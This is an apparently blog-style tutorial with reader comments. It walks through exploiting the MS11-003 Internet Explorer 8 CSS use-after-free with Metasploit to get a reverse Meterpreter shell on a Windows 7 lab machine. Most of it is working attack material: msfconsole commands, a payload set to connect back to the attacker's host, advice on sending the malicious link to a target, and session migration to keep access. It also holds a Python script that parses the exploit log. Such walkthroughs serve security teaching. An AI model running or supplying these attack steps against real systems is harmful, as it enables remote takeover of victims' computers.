In this tutorial we exploit the "Internet Explorer CSS recursive call memory corruption" vulnerability (MS11-003, CVE-2010-3971: a use-after-free in mshtml.dll triggered by a stylesheet that recursively @imports itself) in Internet Explorer 8 on an unpatched Windows 7 Service Pack 1 machine, using Metasploit on Kali Linux, and get a remote shell on the Windows 7 machine.
We have the following configuration:
Windows 7 IP address: 192.168.122.10
Kali Linux IP address: 192.168.122.115
Perform the following steps on the Kali Linux machine.
1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.
root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
2) Start metasploit console.
root@kali:~# msfconsole
msf >
3) Select exploit.
msf > use exploit/windows/browser/ms11_003_ie_css_import
4) Select payload.
msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
5) View options.
msf exploit(ms11_003_ie_css_import) > show options

Module options (exploit/windows/browser/ms11_003_ie_css_import):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   OBFUSCATE  true             no        Enable JavaScript obfuscation
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
6) Set options. URIPATH / makes the exploit page the root of the server, so the link we hand out is short; LHOST is the Kali address the Meterpreter payload will connect back to.
msf exploit(ms11_003_ie_css_import) > set URIPATH /
URIPATH => /
msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.122.115
LHOST => 192.168.122.115
7) Execute the exploit.
msf exploit(ms11_003_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.122.115:4444
msf exploit(ms11_003_ie_css_import) > [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.122.115:8080/
[*] Server started.
8) The user opens the malicious URL. As we can see, the exploit command generated a link. The URL to send to the target is the one on the "Local IP" line, http://192.168.122.115:8080/ (the "Using URL" line shows 0.0.0.0 only because SRVHOST is set to listen on every interface), so that the exploit runs in their browser.
When the user opens the link in Internet Explorer 8, the browser tries to load the page but displays nothing. Instead a Meterpreter session comes back to msfconsole, as shown below.
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 3 (192.168.122.115:4444 -> 192.168.122.10:49224) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3664)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3808
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[+] Successfully migrated to process
[*] Session ID 4 (192.168.122.115:4444 -> 192.168.122.10:49226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3848)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process
As we can see above, the InitialAutoRunScript runs migrate -f, which moves the Meterpreter payload out of iexplore.exe into a freshly spawned notepad.exe. This matters for keeping the session: the memory corruption leaves the browser process unstable, and if the user closes the tab or IE crashes, a session still living in iexplore.exe dies with it, while the migrated one survives in notepad.exe. Note that this only outlives the browser, not a logoff or a reboot; surviving those would need a separate persistence step. Four sessions were opened here rather than one because each came from a different iexplore.exe process (PIDs 2744, 3404, 3664 and 3848): most likely, after each exploited tab died, Internet Explorer 8 reloaded the page, re-fetched generic-1434889455.dll and fired the exploit again, as the repeated "Received request" and "Sending stage" lines show.
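The console output above is the only record of what the module did to the target. As an added example (not part of this tutorial or of Metasploit), the following Python script parses that output: it reconstructs, per client, the delivery chain (redirect, HTML page, the .NET DLL the module loads for its DEP/ASLR bypass, then CSS for everything else), counts the stages sent, and pairs each session with the iexplore.exe PID it started in and the notepad.exe PID that migrate -f moved it to. The sample log is a constructed, trimmed copy of the first two sessions shown above; the regexes, the function names and the assumption that a "Successfully migrated" line belongs to the most recently opened session are mine.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: a trimmed copy (first two sessions) of the console output above.
SAMPLE_LOG = """\
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending redirect
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/iPKMV.html"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending HTML
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] Session ID 1 (192.168.122.115:4444 -> 192.168.122.10:49219) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2744)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3376
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/generic-1434889455.dll"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending .NET DLL
[*] Sending stage (770048 bytes) to 192.168.122.10
[*] 192.168.122.10 ms11_003_ie_css_import - Received request for "/favicon.ico"
[*] 192.168.122.10 ms11_003_ie_css_import - Sending CSS
[+] Successfully migrated to process
[*] Session ID 2 (192.168.122.115:4444 -> 192.168.122.10:49221) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3532
[+] Successfully migrated to process
"""

# Line shapes taken from the module/handler output above (assumed stable for this module).
RE_REQUEST = re.compile(r'^\[\*\] (\S+) ms11_003_ie_css_import - Received request for "(.*)"$')
RE_SENDING = re.compile(r'^\[\*\] (\S+) ms11_003_ie_css_import - Sending (.+)$')
RE_STAGE = re.compile(r'^\[\*\] Sending stage \((\d+) bytes\) to (\S+)$')
RE_SESSION = re.compile(r"^\[\*\] Session ID (\d+) \((\S+) -> (\S+)\) processing InitialAutoRunScript '.+'$")
RE_PROCESS = re.compile(r'^\[\*\] Current server process: (\S+) \((\d+)\)$')
RE_MIGRATING = re.compile(r'^\[\+\] Migrating to (\d+)$')
RE_MIGRATED = re.compile(r'^\[\+\] Successfully migrated to process$')


@dataclass
class Session:
    sid: int
    handler: str           # LHOST:LPORT the victim connected back to
    peer: str              # victim IP:port
    process: str = ""      # process Meterpreter first ran in (iexplore.exe here)
    pid: int = 0
    target_pid: int = 0    # PID that 'migrate -f' moved the session into
    migrated: bool = False


def parse_log(text: str):
    """Return (requests, stages, sessions): requests maps a client IP to the ordered
    list of (path requested, what the module served); stages counts 'Sending stage'
    events per client; sessions holds one Session per 'Session ID' line."""
    requests: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    stages: Dict[str, int] = defaultdict(int)
    sessions: List[Session] = []
    pending: Dict[str, str] = {}  # client -> request the module has not answered yet
    for line in text.splitlines():
        if m := RE_REQUEST.match(line):
            pending[m.group(1)] = m.group(2)
        elif m := RE_SENDING.match(line):
            requests[m.group(1)].append((pending.pop(m.group(1), "?"), m.group(2)))
        elif m := RE_STAGE.match(line):
            stages[m.group(2)] += 1
        elif m := RE_SESSION.match(line):
            sessions.append(Session(int(m.group(1)), m.group(2), m.group(3)))
        # The migrate lines carry no session ID. In the output above they always follow
        # the 'Session ID' line they belong to, so attach them to the newest session.
        elif (m := RE_PROCESS.match(line)) and sessions:
            sessions[-1].process, sessions[-1].pid = m.group(1), int(m.group(2))
        elif (m := RE_MIGRATING.match(line)) and sessions:
            sessions[-1].target_pid = int(m.group(1))
        elif RE_MIGRATED.match(line) and sessions:
            sessions[-1].migrated = True
    return requests, stages, sessions


def css_import_chain(served: List[Tuple[str, str]]) -> bool:
    """True if a client walked the module's delivery chain in order: the HTML page,
    then the .NET DLL, then CSS (the module answers every remaining request with CSS)."""
    kinds = [kind for _, kind in served]
    if "HTML" not in kinds:
        return False
    i = kinds.index("HTML")
    if ".NET DLL" not in kinds[i:]:
        return False
    j = kinds.index(".NET DLL", i)
    return "CSS" in kinds[j:]


def report(text: str) -> dict:
    """Summarise a console log: who was exploited, how many stages went out, and
    which process each session started in and migrated to."""
    requests, stages, sessions = parse_log(text)
    return {
        "exploited_clients": sorted(c for c, seq in requests.items() if css_import_chain(seq)),
        "stages_sent": dict(stages),
        "sessions": [(s.sid, s.process, s.pid, s.target_pid, s.migrated) for s in sessions],
    }
```

Running report(SAMPLE_LOG) on the sample gives one exploited client, two stages sent, and sessions 1 and 2 starting in iexplore.exe PIDs 2744 and 3404 and migrated into 3376 and 3532. Fed the full output above it would show all four sessions, each starting in a different iexplore.exe, which is the quickest way to confirm that every stage corresponds to a fresh browser process rather than to a duplicate handler.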
9) View the sessions.
msf exploit(ms11_003_ie_css_import) > sessions -i

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC   192.168.122.115:4444 -> 192.168.122.10:49219 (192.168.122.10)
  2   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC   192.168.122.115:4444 -> 192.168.122.10:49221 (192.168.122.10)
  3   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC   192.168.122.115:4444 -> 192.168.122.10:49224 (192.168.122.10)
  4   meterpreter x86/win32  shabbir-PC\ali @ SHABBIR-PC   192.168.122.115:4444 -> 192.168.122.10:49226 (192.168.122.10)
10) Connect to the remote machine.
msf exploit(ms11_003_ie_css_import) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SHABBIR-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > getuid
Server username: shabbir-PC\ali
meterpreter > shell
Process 2704 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\ali\Desktop>
Yeah! Great work.
Wow! Great work.

I sent that link through mail. After switching to my Windows machine I opened the browser and clicked on that link. A new tab opens and shows the "The site can't be reached" error. What could be the problem?

Is there a CVE for this?